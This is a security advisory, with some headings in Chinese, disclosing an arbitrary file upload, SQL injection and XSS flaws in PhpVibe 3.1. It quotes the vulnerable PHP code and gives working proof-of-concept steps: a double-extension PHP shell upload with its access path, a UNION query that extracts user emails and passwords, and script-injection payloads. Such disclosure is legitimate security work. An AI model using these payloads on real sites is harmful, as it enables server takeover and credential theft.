##################################################################
#标题: PhpVibe 3.1 - Multiple Vulnerabilites
#厂商: PhpVibe
#官网: http://phprevolution.com/
#风险级别: High 
#漏洞发现这: Esac
################################################################# 
 
 
+----------+
| 回溯 |
+----------+
 
PhpVibe is a Premium video sharing cms with or without upload. Supports all main video sharing websites like Youtube, Vimeo, Dailymotion, Metacafe… and flv, mp4, mp3 uploads. No ffmpeg required. Upload option can be turned off.
 
+-----------------------------------------------------------------------------------+
 
 
+-------------------------------------+
| 远程任意文件上传 |
+-------------------------------------+
 
 缺陷文件 : upload.php 
 
 
...............................................
 
 
    if ($_FILES['file']['name']!='') {
    $fileName= $_FILES['file']['name'];
    $fileSize = $_FILES['file']['size'];
    $ext = substr($fileName, strrpos($fileName, '.') + 1);
    if (in_array($ext,$allowedExts) or empty($allowedExts)) {
        if ($fileSize<$maxFileSize or empty($maxFileSize)) {
    $target_path = $target_path . basename( $_FILES['file']['name']);
    if(move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) {
        echo '{"success":true, "file": "'.$target_path.'"}';
            vinsert(basename( $_FILES['file']['name']),basename( $_FILES['file']['name']));
    } else{
        echo '{"success":false, "details": "move_uploaded_file failed"}';
    }
} else { echo('{"success":false, "details": "Maximum file size: '.ByteSize($maxFileSize).'."}'); };
} else echo('{"success":false, "details": "File type '.$ext.' not allowed."}');
} else echo '{"success":false, "details": "No file received."}';
 
 
real exploitation :
 
to exploit this vuln , u must be a registred user and go to upload video area 
 
http://server/upload
 
upload ur evil file as evil.php.mp3 or file.php.mp4 or file.php.flv
 
Shell access :
 
http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3
 
Demo : 
 
server/media/flv/august-23-13-5-10-pm-evil.php.flv
 
 
+-----------------------------------------------------------------------------------+
 
 
+---------------+
| SQL Injection |
+---------------+
  
PhpVibe is possibly vulnerable to SQL Injection attacks , affected file : rss.php , param : cat
 
affected code :
 
//rss.php , line 24
 
function clean_feed($input) 
{
    $original = array("<", ">", "&", '"', "'", "<br/>", "<br>");
    $replaced = array("<", ">", "&", ""","'", "", "");
    $newinput = str_replace($original, $replaced, $input);
     
    return $newinput;
}
 
 
echo'<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
';
echo '
<title>'.$seo_title.'</title>
<description>'.$seo_desc.'</description>
<link>'.$site_url.'</link>
';
if($cat = MK_Request::getQuery('cat')) {
$vbox_result = dbquery("select * from videos WHERE category ='".$cat."' > 0 ORDER BY id DESC limit 0, 30");
} else {
$vbox_result = dbquery("select * from videos WHERE views > 0 ORDER BY id DESC limit 0, 30");
}
while($videosData = mysql_fetch_array($vbox_result))
{
    $url = $site_url.'video/'.$videosData["id"].'/'.seo_clean_url($videosData['title']) .'/';
    $rss_datetime = $videosData["date"];
 echo '
     <item>
<title>'.strip_tags($videosData['title']).'</title>
<link><![CDATA['.$url.']]></link>
<guid><![CDATA['.$url.']]></guid>
<pubDate>'.$rss_datetime.'</pubDate>
<description>[CDATA['.clean_feed($videosData["description"]).' ]]</description>
</item>
      
     ';
 
}
 
echo'</channel>
 
 
 
Poc :
 
http://server/rss.php?cat=-1+union+select+concat_ws(id,email,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--
 
 
+--------------------------------------------------------------------------------------+
 
+-----------+
|XSS Attack |
+-----------+
 
Multiple XSS vulnerabilities have been detected in phpVibe 3.1
 
1) Input appended via the URL to show/ is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
 
exemple :
http://server/show/'">><marquee><h1>XSS</h1></marquee>
 
 
 
2) Input passed to the "email" parameter in forgot-pass.php, login.php, and register.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 3.1. Other versions may also be affected.
 
示例 :
 
http://server/forgot-pass.php   => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/login.php         => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/register.php      => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>